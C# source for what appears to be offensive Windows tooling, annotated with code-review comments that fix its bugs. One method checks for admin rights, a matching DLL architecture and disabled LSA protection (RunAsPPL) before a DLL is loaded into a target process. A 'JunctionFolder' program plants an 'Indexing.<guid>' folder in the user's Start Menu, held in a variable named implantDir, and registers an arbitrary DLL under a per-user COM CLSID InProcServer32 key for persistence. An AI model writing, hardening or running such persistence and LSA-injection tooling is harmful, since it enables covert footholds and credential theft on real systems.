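        /// <summary>
        /// Pre-flight checks before the DLL is used: the caller must hold the
        /// Administrators role, the DLL's PE machine type must match the OS
        /// architecture, and LSA protection (HKLM\SYSTEM\CurrentControlSet\Control\Lsa,
        /// DWORD value RunAsPPL) must not be enabled. Each failing check prints a
        /// "[-]" line and stops. Sets the shared <c>osArch</c> field as a side effect.
        /// </summary>
        /// <param name="dllPath">Full path of the DLL whose PE header is read by GetDllMachineType.</param>
        /// <returns>
        /// true when every check passed, false otherwise. The original returned void;
        /// callers that ignore the result still compile, but now a caller can stop on failure
        /// instead of continuing after "Exiting." was printed.
        /// </returns>
        public static bool PreflightChecks(string dllPath)
        {
            WindowsIdentity  identity  = WindowsIdentity.GetCurrent();
            WindowsPrincipal principal = new WindowsPrincipal(identity);

            if (!principal.IsInRole(WindowsBuiltInRole.Administrator))
            {
                Console.WriteLine("[-] You do not have admin privileges. Exiting.");
                return false;
            }

            // OS architecture. PROCESSOR_ARCHITEW6432 only says whether *this* process is a
            // 32-bit process under WOW64; it is unset on a real 32-bit OS, so the old check
            // reported "x64" there. The DLL is loaded by the target process, not by us, so
            // the OS bitness is what must match.
            if (Environment.Is64BitOperatingSystem)
            {
                Console.WriteLine("[+] Detected x64 system architecture.");
                osArch = "x64";
            }
            else
            {
                Console.WriteLine("[+] Detected x86 system architecture.");
                osArch = "x86";
            }

            // DLL architecture. IMAGE_FILE_MACHINE_IA64 is Itanium, not x64, so only AMD64
            // counts as x64. Anything else (ARM64, a non-PE file) used to leave dllArch null
            // and throw NullReferenceException on the comparison below.
            MachineType type    = GetDllMachineType(dllPath);
            string      dllArch = null;

            if (type.Equals(MachineType.IMAGE_FILE_MACHINE_I386))
            {
                Console.WriteLine("[+] Detected DLL x86 DLL architecture");
                dllArch = "x86";
            }
            else if (type.Equals(MachineType.IMAGE_FILE_MACHINE_AMD64))
            {
                Console.WriteLine("[+] Detected DLL x64 DLL architecture");
                dllArch = "x64";
            }

            if (dllArch == null)
            {
                Console.WriteLine("[-] Unrecognised DLL machine type. Exiting.");
                return false;
            }
            if (!dllArch.Equals(osArch))
            {
                Console.WriteLine("[-] Detected architecture mismatch. Make sure your DLL architecture matches the host's.");
                return false;
            }

            // RunAsPPL is a DWORD *value* under the Lsa key, not a subkey. The original
            // OpenSubKey(@"...\Lsa\RunAsPPL") always returned null, so the check never fired.
            // 1 = enabled, 2 = enabled without UEFI lock; treat any non-zero as enabled.
            using (RegistryKey lsa = Registry.LocalMachine.OpenSubKey(@"SYSTEM\CurrentControlSet\Control\Lsa"))
            {
                object runAsPpl   = (lsa == null) ? null : lsa.GetValue("RunAsPPL");
                bool   pplEnabled = runAsPpl != null && Convert.ToInt32(runAsPpl) != 0;

                if (pplEnabled)
                {
                    Console.WriteLine("[-] RunAsPPL registry key set. Exiting...");
                    return false;
                }
            }

            // NOTE(review): an absent or zero value is not proof that LSA protection is off —
            // newer Windows builds can enable it by default or via policy without this value.
            // Event ID 12 from Wininit in the System log is the authoritative signal; confirm.
            Console.WriteLine("[+] RunAsPPL registry key not set!");
            return true;
        }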
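        /// <summary>
        /// Sample entry point: prints the architecture of a hard-coded DLL path and waits for
        /// a key press. IMAGE_FILE_MACHINE_IA64 is Itanium; x64 images carry
        /// IMAGE_FILE_MACHINE_AMD64, which the original never tested, so a real x64 DLL
        /// printed nothing and an Itanium DLL was mislabelled as x64.
        /// </summary>
        static void Main(string[] args)
        {
            MachineType type = GetDllMachineType("path/to/MyAssembly.dll");

            if (type.Equals(MachineType.IMAGE_FILE_MACHINE_I386))
            {
                Console.WriteLine("Dll architecture: x86/32bit");
            }
            else if (type.Equals(MachineType.IMAGE_FILE_MACHINE_AMD64))
            {
                Console.WriteLine("Dll architecture: x64/64bit");
            }
            else if (type.Equals(MachineType.IMAGE_FILE_MACHINE_IA64))
            {
                Console.WriteLine("Dll architecture: IA64/Itanium");
            }
            else
            {
                Console.WriteLine("Dll architecture: unknown");
            }

            Console.ReadKey();
        }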
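        /// <summary>
        /// Classifies the DLL at <paramref name="path"/> as "x86" or "x64" from its PE
        /// machine type, stores the result in the shared <c>arch</c> field and returns it.
        /// </summary>
        /// <param name="path">Full path of the DLL to inspect via GetDllMachineType.</param>
        /// <returns>
        /// "x86", "x64", or null for any other machine type. The original left <c>arch</c>
        /// untouched in that case and so returned whatever an earlier call had stored.
        /// </returns>
        public static string getArch(string path)
        {
            MachineType dlltype = GetDllMachineType(path);

            // Reset first so an unrecognised type cannot leak a stale value.
            arch = null;

            if (dlltype.Equals(MachineType.IMAGE_FILE_MACHINE_I386))
            {
                Console.WriteLine("Dll architecture: x86/32bit");
                arch = "x86";
            }
            else if (dlltype.Equals(MachineType.IMAGE_FILE_MACHINE_AMD64))
            {
                Console.WriteLine("Dll architecture: x64/64bit");
                arch = "x64";
            }
            else
            {
                Console.WriteLine("Dll architecture: unknown");
            }

            return arch;
        }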
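        /// <summary>
        /// Entry point. Validates the DLL path and architecture, creates the
        /// "Indexing.&lt;guid&gt;" folder under the per-user Start Menu Accessories directory,
        /// then registers the DLL as the default value of
        /// HKCU\SOFTWARE\Classes\CLSID\&lt;guid&gt;\InProcServer32 (per-user, no elevation
        /// needed for the write). Exits with status 1 on any failure.
        /// <c>guid</c> and <c>osArch</c> are fields declared elsewhere in the class.
        /// </summary>
        /// <param name="args">args[0] is the full path of the DLL.</param>
        static void Main(string[] args)
        {
            if (args.Length != 1)
            {
                Console.WriteLine("[-] Usage: JunctionFolder.exe <full path to DLL>");
                Environment.Exit(1);
            }

            string dllPath = args[0];

            if (!File.Exists(dllPath))
            {
                Console.WriteLine("[-] DLL does not appear to exist on the system. Did you provide the full path?");
                Environment.Exit(1);
            }

            // OS architecture. PROCESSOR_ARCHITEW6432 only says whether *this* process is a
            // 32-bit process under WOW64; it is unset on a real 32-bit OS, so the old check
            // reported "x64" there. The DLL is loaded by the COM client, not by us, so the OS
            // bitness is what must match.
            if (Environment.Is64BitOperatingSystem)
            {
                Console.WriteLine("[+] Detected x64 system architecture.");
                osArch = "x64";
            }
            else
            {
                Console.WriteLine("[+] Detected x86 system architecture.");
                osArch = "x86";
            }

            // DLL architecture. IMAGE_FILE_MACHINE_IA64 is Itanium, not x64, so only AMD64
            // counts as x64. Anything else (ARM64, a non-PE file) used to leave dllArch null
            // and throw NullReferenceException on the comparison below.
            MachineType type    = GetDllMachineType(dllPath);
            string      dllArch = null;

            if (type.Equals(MachineType.IMAGE_FILE_MACHINE_I386))
            {
                Console.WriteLine("[+] Detected DLL x86 DLL architecture");
                dllArch = "x86";
            }
            else if (type.Equals(MachineType.IMAGE_FILE_MACHINE_AMD64))
            {
                Console.WriteLine("[+] Detected DLL x64 DLL architecture");
                dllArch = "x64";
            }

            if (dllArch == null)
            {
                Console.WriteLine("[-] Unrecognised DLL machine type. Exiting.");
                Environment.Exit(1);
            }
            if (!dllArch.Equals(osArch))
            {
                Console.WriteLine("[-] Detected architecture mismatch. Make sure your DLL architecture matches the host's.");
                Environment.Exit(1);
            }

            // Create the junction folder. Path.Combine avoids relying on a trailing
            // backslash in the literal.
            // NOTE(review): the COM junction-point convention expects the folder name to end
            // in the CLSID *in braces*; whether `guid` already includes them is not visible
            // here — confirm against the field's initialiser.
            string appData    = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData);
            string implantDir = Path.Combine(appData, @"Microsoft\Windows\Start Menu\Programs\Accessories");
            string target     = Path.Combine(implantDir, "Indexing." + guid);

            try
            {
                Directory.CreateDirectory(target);
            }
            catch (Exception e)
            {
                Console.WriteLine("[-] Unable to create the junction folder");
                Console.WriteLine(e);
                Environment.Exit(1);
            }
            // Print the real path; the old message claimed %APPDATA%\Indexing.<guid>, which is
            // not where the folder is created.
            Console.WriteLine("[+] Created junction folder at " + target);

            // Set up the registry key. CreateSubKey is now inside the try (it can throw just
            // like SetValue), and the key is disposed on every path.
            string key = @"SOFTWARE\Classes\CLSID\" + guid + @"\InProcServer32";

            try
            {
                using (RegistryKey regkey = Registry.CurrentUser.CreateSubKey(key))
                {
                    regkey.SetValue("", dllPath);
                }
            }
            catch (Exception e)
            {
                Console.WriteLine("[-] Could not write the registry key");
                Console.WriteLine(e);
                Environment.Exit(1);
            }
            Console.WriteLine("[+] Registry key written");
        }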